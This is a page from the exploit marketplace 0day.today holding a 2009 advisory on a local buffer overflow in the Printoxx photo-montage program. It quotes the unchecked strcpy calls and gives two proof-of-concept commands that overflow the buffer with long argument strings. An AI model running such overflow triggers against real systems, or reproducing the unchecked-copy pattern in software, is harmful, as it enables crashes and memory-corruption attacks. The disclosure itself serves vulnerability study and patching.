0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Printoxx Local Buffer Overflow
============================== Printoxx Local Buffer Overflow ============================== # Title: Printoxx Local Buffer Overflow # CVE-ID: () # OSVDB-ID: () # Author: sandman # Published: 2009-12-23 # Verified: no view source print? # Exploit Title: Printoxx Local Buffer Overflow # Date: 23 Dec, 2009 # Software Link: http://kornelix.squarespace.com/printoxx/, http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz # Version: <= 2.1.2 # Tested on: Fedora 12 # CVE: None # Code: Description: "from website" Printoxx is a free open source Linux program for making and printing a photo montage. Images can be added to a layout page using the mouse to select and drop into place. Images can be moved around and resized using the mouse. Text can be added using any font, and moved around as needed. Vulnerability: Printoxx does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy. The affected code segment is shown below. Affected Code Segment: ..... else if (strEqu(argv[ii],"-i") && argc > ii+1) // -i imageDirectory strcpy(imagedirk,argv[++ii]); //Overflow else if (strEqu(argv[ii],"-f") && argc > ii+1) // -f imageFile strcpy(clfile,argv[++ii]); //Overflow else strcpy(clfile,argv[ii]); //Overflow // assume imageFile } ...... Proof Of Concept: Image filename overflow: $ ./printoxx -i $(python -c 'print "A"*1000') Directory filename overflow: $ ./printoxx -f $(python -c 'print "A"*1000') Severity: Very Low Note: Since this was tested on Fedora 12, the system automatically detected the operation as a possible buffer overflow attempt instead of a regular segfault. This is due to the fact that all executables on Red-Hat RHEL and Fedora systems are compiled with canaries enabled. #$ # 0day.today [2024-12-24] #